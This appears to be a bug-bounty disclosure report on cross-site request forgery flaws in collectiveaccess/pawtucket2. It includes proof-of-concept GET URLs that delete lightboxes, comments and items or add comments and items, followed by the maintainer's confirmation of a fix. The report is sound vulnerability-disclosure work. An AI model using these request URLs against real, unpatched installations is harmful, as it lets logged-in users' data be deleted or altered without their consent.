Cross-Site Request Forgery (CSRF) in collectiveaccess/pawtucket2

Valid

Reported on

Oct 1st 2021


Description

The following endpoints are vulnerable to CSRF attacks via GET requests (even though they use AJAX):

1: Delete lightbox 2: Delete comments 3: Create comments 4: Create comments on objects 5: Add items into lightbox 6: Delete items from lightbox

Proof of Concept

Copy and paste the following into the URL while logged in,

1: http://[PAWTUCKET-URL]/pawtucket/index.php/Lightbox/DeleteLightbox?set_id=1
2: http://[PAWTUCKET-URL]/pawtucket/index.php/Lightbox/AjaxDeleteComment?comment_id=10
3: http://[PAWTUCKET-URL]/pawtucket/index.php/Lightbox/AjaxAddComment?comment=LOL&type=ca_sets&id=1
4: http://[PAWTUCKET-URL]/pawtucket/index.php/Detail/saveCommentTagging?tags=LOL&comment=LOL&item_id=1&tablename=ca_objects
5: http://[PAWTUCKET-URL]/pawtucket/index.php/Lightbox/AjaxAddItem?set_id=1&name=&description=&object_id=1&object_ids=&saveLastResults= 
6: http://[PAWTUCKET-URL]/pawtucket/index.php/Lightbox/AjaxDeleteItem?set_id=1&item_id=1

Impact

Delete/disrupt user created lightboxes

We have contacted a member of the collectiveaccess/pawtucket2 team and are waiting to hear back 2 months ago
CollectiveAccess validated this vulnerability 2 months ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
CollectiveAccess
2 months ago

Maintainer


Fix in place for this.

CollectiveAccess confirmed that a fix has been merged on 335159 2 months ago
CollectiveAccess has been awarded the fix bounty